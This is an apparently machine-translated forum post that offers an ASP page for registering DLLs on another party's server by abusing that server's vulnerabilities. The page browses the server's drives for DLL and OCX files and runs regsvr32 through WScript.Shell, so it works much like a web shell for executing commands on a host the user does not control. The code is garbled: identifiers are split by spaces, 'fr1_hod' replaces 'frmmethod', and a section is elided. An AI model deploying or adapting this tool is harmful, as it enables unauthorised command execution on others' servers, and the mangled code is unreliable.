Remotely register DLL using the vulnerability of the opposite Server
I downloaded the same component together with my friend, but it was useless because I was unable to register it. But recently I found that he was using this component and it was already registered. It's strange that, how did he register it? I asked him not to mention it.
In fact, we have a shortcut to remotely register DLL in ASP, but we need to "cooperate" with the server vulnerabilities of the other party (what vulnerabilities? I don't have to say anything, read it myself ). Try the followingCode, Maybe you are lucky to succeed:
<% Response. Buffer = true %>
<% Server. scripttimeout = 500
Dim frmfolderpath, frmfilepath
Frmfolderpath = request. Form ("frmfolderpath ")
Frmfilepath = request. Form ("frmdllpath ")
Frmmethod = request. Form ("frmmethod ")
Btnreg = request. Form ("btnreg ")
%>
<HTML>
<Head>
<Title> remote DLL registration for spring breeze </title>
<Style type = "text/CSS">
. Legend {font-family: veranda; font-size: 14px; font-weight: bold; color: Blue}
. FS {font-family: veranda; font-size: 12px; border-width: 4px; border-color: green;
Margin-left: 2px; margin-Right: 2px}
TD {margin-left: 6px; margin-Right: 6px; padding-left: 12px; padding-Right: 12px}
</Style>
</Head>
<Body>
<Form name = "regform" method = "Post">
<Table border = 0 cellspacing = 6 cellpadding = 6 marginwidth = 6>
<Tr>
<TD valign = top>
<Fieldset id = fs1 name = fs1 class = FS>
<Legend class = legend> Register DLL </legend>
The path to the dll Directory.
<Input type = text name = "frmfolderpath" value = "<% = frmfolderpath %>">
<Input type = submit name = btnfilelist value = "Create File List">
<%
If request. Form ("btnfilelist") <> "" Or btnreg <> "" then
Set registerfiles = new clsregister
Registerfiles. echob ("select file ")
Call registerfiles. INIT (frmfolderpath)
Registerfiles. echob ("
<Input type = submit name = btnreg value = "& CHR (34 )_
& "Reg/unreg" & CHR (34) & "> ")
If request. Form ("btnreg") <> "then
Call registerfiles. Register (frmfilepath, fr1_hod)
End if
Set registerfiles = nothing
End if
%>
</Fieldset>
</TD>
</Tr>
</Table>
</Form>
</Body>
</Html>
<%
Class clsregister
Private m_ofs
Public property let ofs (objofs)
M_ofs = objofs
End Property
......
Sub Init (strroot) 'root to search (C:, D:, e :)
Dim odrive, orootdir
If ofs. folderexists (strroot) then
If Len (strroot) <3 then 'must be a drive
Set odrive = ofs. getdrive (strroot)
Set orootdir = odrive. rootfolder
Else
Set orootdir = ofs. getfolder (strroot)
End if
Else
Echob ("Oh, folder (" & strroot & ") not found! ")
Exit sub
End if
Setroot = orootdir
Echo ("<select name =" & CHR (34) & "frmdllpath" & CHR (34) & "> ")
Call getalldlls (orootdir)
Echob ("</SELECT> ")
Buildoptions
End sub
Sub getalldlls (oparentfolder)
Dim osubfolders, ofile, ofiles
Set osubfolders = oparentfolder. subfolders
Set opfiles = oparentfolder. Files
For each ofile in opfiles
If right (lcase (ofile. Name), 4) = ". dll" or right (lcase (ofile. Name), 4) = ". ocx" then
Echo ("<option value =" & CHR (34) & ofile. Path & CHR (34) & "> "_
& Ofile. Name & "</option> ")
End if
Next
On Error resume next
For each ofolder in osubfolders 'iterate all folders in Drive
Set ofiles = ofolder. Files
For each ofile in ofiles
If right (lcase (ofile. Name), 4) = ". dll" or right (lcase (ofile. Name), 4) = ". ocx" then
Echo ("<option value =" & CHR (34) & ofile. Path & CHR (34) & "> "_
& Ofile. Name & "</option> ")
End if
Next
Call getalldlls (ofolder)
Next
On Error goto 0
End sub
Sub register (strfilepath, regmethod)
Dim thefile, strfile, oshell, exitcode
Set thefile = ofs. GetFile (strfilepath)
Strfile = thefile. Path
Set oshell = Createobject ("wscript. Shell ")
If regmethod = "Reg" then'register
Oshell. Run "C: \ winnt \ system32 \ regsvr32.exe/s" & strfile, 0, false
Exitcode = oshell. Run ("C: \ winnt \ system32 \ regsvr32.exe/s" & strfile, 0, false)
Echob ("regsvr32.exe exitcode =" & exitcode)
Else 'unregister
Oshell. Run "C: \ winnt \ system32 \ regsvr32.exe/u/s" & strfile, 0, false
Exitcode = oshell. Run ("C: \ winnt \ system32 \ regsvr32.exe/u/s" & strfile, 0, false)
Echob ("regsvr32.exe exitcode =" & exitcode)
End if
Cleanup oshell
End sub
Sub buildoptions
Echob ("register: <input type = radio name = frmmethod value = reg checked> ")
Echob ("unregister: <input type = radio name = fr1_hod value = unreg> ")
End sub
Function echo (STR)
Echo = response. Write (STR & vbcrlf)
End Function
Function echob (STR)
Echob = response. Write (STR &"
"& Vbcrlf)
End Function
Sub cleanup (OBJ)
If isobject (OBJ) then
Set OBJ = nothing
End if
End sub
Sub class_terminate ()
Cleanup OFS
End sub
End Class
%>